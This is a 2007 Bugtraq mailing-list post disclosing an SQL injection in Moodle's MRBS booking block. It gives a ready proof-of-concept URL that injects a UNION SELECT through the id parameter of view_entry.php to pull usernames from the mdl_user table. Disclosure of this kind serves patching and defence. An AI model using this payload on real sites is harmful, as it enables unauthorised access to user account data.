Bugtraq mailing list archives
Moodle SQL Injection
From: root () hanicker it
Date: 21 Dec 2007 10:04:31 -0000
Moodle.org PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=[SQL]&day=27&month=10&year=2007 And a POC: PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007
Current thread:
- Moodle SQL Injection root (Dec 21)
- <Possible follow-ups>
- Re: Moodle SQL Injection foo (Dec 22)
- Re: Re: Moodle SQL Injection bar (Dec 22)